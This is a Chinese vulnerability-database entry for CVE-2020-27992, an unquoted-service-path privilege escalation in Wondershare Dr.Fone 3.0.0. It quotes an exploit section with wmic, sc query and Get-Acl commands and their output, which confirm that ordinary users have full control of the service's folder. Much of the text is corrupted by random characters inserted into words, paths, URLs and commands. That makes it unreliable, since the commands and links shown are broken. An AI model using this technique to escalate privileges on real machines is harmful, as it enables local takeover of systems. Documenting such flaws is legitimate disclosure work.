Wondershare Dr.Fone 安全漏洞

漏洞ID 2215880 漏洞类型 其他
发布时间 2020-10-31 更新时间 2020-11-02
CVE编号 CVE-2020-27992

CNNVD-ID CNNVD-202010-1675
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurity.com/issue/Z ~ F ( o H X i pWLB-202B y s O I M0100205
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202010-167z * , X 4 5 X5
漏洞详情
Wondershare Dr.Fone是中国万兴科技(Wondershare)公司的一款移动设备工具箱软件。该软件为设备提供应用程序、传输数据、联系人、消息等辅助功能。
Dr.Fo + , Z O #one 3.0.0 版本存在安全漏洞,该漏洞允许本地用户通过DriverInstall.exe获得特权。
漏洞EXP
# Exploit Title: Wondershare Dr.Fone DriverInstall.exe - "WsDrvt ` V D 6 S U * aInst" Unquoted Service Path
#! x % 8 d U G O D? & f @ Z v 8ate: 2020-10-29
# Exploit Au4 e + vthor: AndreI H G 4a Intilangelo
# Vendor Homepage: https://www.wondershare.com
# Software Link: https://drfone.wondershare.com/
# Version: 3.0.0
# Tested on: Microsof# T ~ i E ? N it Windows 7sp2 x86/x64
# CVE : CVE-2020-27992
- CX g c F Z ?:\>wmic service get namh ) Ue,displayname,pathname,startmode findstr /i "auto" findstr /i /v "c:\windows\\" findstr /i /v """
Wondershare Driver Install Service	WsDrvInst	C:\Prog^ F ? d ? Dram Files (x86H 3 x u b m)\Wondershare\dr.foS b T F  y En; Q . c ~ ? l K 9e\Library\Driverw ^ A NInstaller\DriverIns5 4 ; Btall.exe	Auto
- C:\>sc query WsDrvInst
NOME_SERVIZIO: WsDrvInst
TIPO                   : 10  WIN32_OW : u u D k T {N_PROCESS
STATO                  : 4  RUN+ D V k F 7 ! 5NING9 4 4
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CODICE_USCITA_WIN32    : 0  (0x0)
CODICE_USCITA_SERVIZIO : 0  (0x0)
PUNTO_CONTROLLO          : 0x0
INDICAZIONE_ATTEM 3 n # % T G d pSA     :7 & S _ e 0x0
- Get-Acl -Path "C:~ Y V D = r ZPx ( ) I v rrogram Files (x86)\Wondershare\dX p Gr.fone\Library\DriverInstaller"
Directory: C:\Program Files (x86)\Wondershare\dr.fone\Library
Path                                    Owner                                   Access
----                                    ----2 } . A 7 x  T #-                                   ------U . i e S = d
DriverInstaller                         BUILTIN\Administrators                  BUILTIN\Users Allow  FullControl...
参考资料

来源:packetsto- 2 m W l 7 Vrmsecurity.comI ] ? G

链接:https://packetstormsb ] D | U 9 ; $ Kecurity.c) f 3 M c b oom/files/159775/Wondershare-Dr.Fone-3.0.0-Unquoted-Service-P_ D M ^ 2 B :ath.htJ Y ( b : _ B ~ lml